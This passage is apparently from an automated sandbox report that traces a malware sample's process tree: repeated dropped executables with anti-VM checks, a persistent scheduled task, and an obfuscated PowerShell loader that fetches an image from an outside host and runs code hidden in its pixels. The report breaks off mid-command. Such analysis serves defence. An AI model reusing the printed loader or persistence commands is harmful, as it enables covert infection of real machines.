                              1⤵
                              • Executes dropped EXE
                              PID:2476
                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:5160
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:1652
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:5568
                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:3736
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:2828
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:932
                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:5524
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:3936
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:4540
                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:4336
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:7164
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:5856
                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:6928
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:2284
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:1056
                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:6736
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:4764
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:4900
                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:2232
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:5892
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:2364
                            • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                              "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:5464
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:1552
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                              1⤵
                              • Executes dropped EXE
                              PID:5944
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 556 -ip 556
                              1⤵
                                PID:3580
                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:2188
                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:6696
                              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:4716
                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:3396
                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:6016
                              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:5292
                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:6928
                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5244
                              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:2760
                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:3256
                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5000
                              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:4960
                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:4764
                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:3316
                              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:2536
                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                1⤵
                                • Executes dropped EXE
                                PID:1248
                              • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                1⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:4592
                              • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                1⤵
                                  PID:4368
                                • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                  "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                  1⤵
                                    PID:1584
                                  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                    "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                    1⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:6212
                                  • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                    "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                    1⤵
                                      PID:6488
                                    • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                      "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                      1⤵
                                        PID:5832
                                      • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                        1⤵
                                          PID:4104
                                        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                          1⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:5820
                                        • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                          "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                          1⤵
                                            PID:4304
                                          • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                            "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                            1⤵
                                              PID:2740
                                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                              1⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              PID:1148
                                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                              1⤵
                                                PID:5184
                                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                1⤵
                                                  PID:1396
                                                • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                  1⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:5804
                                                • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                  1⤵
                                                    PID:6376
                                                  • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                    1⤵
                                                      PID:5948
                                                    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                      1⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:2932
                                                    • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                      1⤵
                                                        PID:6972
                                                      • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                        1⤵
                                                          PID:2772
                                                        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:2232
                                                        • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                          1⤵
                                                            PID:1604
                                                          • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                            1⤵
                                                              PID:2628
                                                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                              1⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:4264
                                                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                              1⤵
                                                                PID:4912
                                                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                1⤵
                                                                  PID:5256
                                                                • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                  1⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:4340
                                                                • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                  1⤵
                                                                    PID:5212
                                                                  • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                    1⤵
                                                                      PID:2916
                                                                    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                      1⤵
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Identifies Wine through registry keys
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:5556
                                                                    • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                      1⤵
                                                                        PID:4136
                                                                      • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                        1⤵
                                                                          PID:6060
                                                                        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                          1⤵
                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                          • Checks BIOS information in registry
                                                                          • Identifies Wine through registry keys
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:5888
                                                                        • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                          1⤵
                                                                            PID:6272
                                                                          • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                            1⤵
                                                                              PID:5776
                                                                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                              1⤵
                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                              • Checks BIOS information in registry
                                                                              • Identifies Wine through registry keys
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:1792
                                                                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                              1⤵
                                                                                PID:7108
                                                                              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                                1⤵
                                                                                  PID:6200
                                                                                • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                  1⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:6556
                                                                                • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                                  1⤵
                                                                                    PID:6024
                                                                                  • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                                    1⤵
                                                                                      PID:5456
                                                                                    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                      1⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:7148
                                                                                    • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                                      1⤵
                                                                                        PID:4996
                                                                                      • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                                        1⤵
                                                                                          PID:3080
                                                                                        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                          1⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Identifies Wine through registry keys
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:1328
                                                                                        • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                                          1⤵
                                                                                            PID:5904
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Admin\10009630142\asyn.ps1
                                                                                            1⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:4224
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              "C:\Windows\system32\schtasks.exe" /create /tn Admin /SC minute /MO 30 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\10009630142\asyn.ps1"" /F
                                                                                              2⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:4964
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -WindowStyle Hidden -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "
                                                                                              2⤵
                                                                                              • An obfuscated cmd.exe command-line is typically used to evade detection.
                                                                                              PID:6984
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -NoProfile -NonInteractive -WindowStyle Hidden -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,